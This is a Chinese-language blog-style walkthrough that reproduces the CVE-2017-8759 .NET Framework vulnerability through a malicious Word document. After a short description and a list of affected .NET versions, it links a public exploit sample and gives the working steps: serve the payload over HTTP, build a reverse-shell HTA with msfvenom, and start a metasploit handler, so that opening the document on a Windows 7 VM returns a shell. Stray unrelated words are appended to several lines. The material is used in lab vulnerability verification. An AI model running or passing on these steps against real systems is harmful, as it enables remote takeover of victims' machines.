近日,360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击,攻击使用了9月12日补丁刚修复的.NET Framework漏洞,该漏洞在野外被利用时为0day状态,用户打开恶意的Office文档就会中招。该漏洞的技术原理和今年黑客“奥斯卡”Pwnie Awards上的最佳客户端漏洞(CVE-2017-0199)一模一样,不一样的是,此次黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码,而整个漏洞的罪魁祸首竞是.NET Framework一个换行符处理失误。html
影响范围:python
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.7
Microsoft .NET Framework 4.6
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 2.0 SP2git
exploit-sample地址:https://github.com/Voulnet/CVE-2017-8759-Exploit-samplegithub
将文件下载下来,打开所在的文件夹,在当前文件夹建立一个命令行,运行:
python -m SimpleHTTPServer 8080
shell
这个时候咱们已经在本地的8080端口建立了一个服务器了windows
而后打开doc文件,启用编辑,就会弹出画图工具,漏洞验证成功安全
环境说明:服务器
word的宏tcp
exploit.txt 文件工具
cmd.hta文件
因此流程是:
word宏 ==》 exploit.txt ==》 cmd.hta
访问文件
fn.hta是我用msfvenom生成的,具体命令以下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta
或者
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta
虚拟机kali(192.168.242.137)启动metasploit
use exploit/multi/handler set PAYLOAD windows/x64/shell/reverse_tcp set LHOST 192.168.242.137 set LPORT 7777 exploit
修改过宏的文档在win7打开,反弹回来一个shell
打开word文档的这个过程,360会进行提示但不是报毒,最后还会留下这么一个窗口
至此,漏洞验证到利用结束
这二者利用参考文章freebuf有:http://www.freebuf.com/sectool/90362.html
最后,参考文档: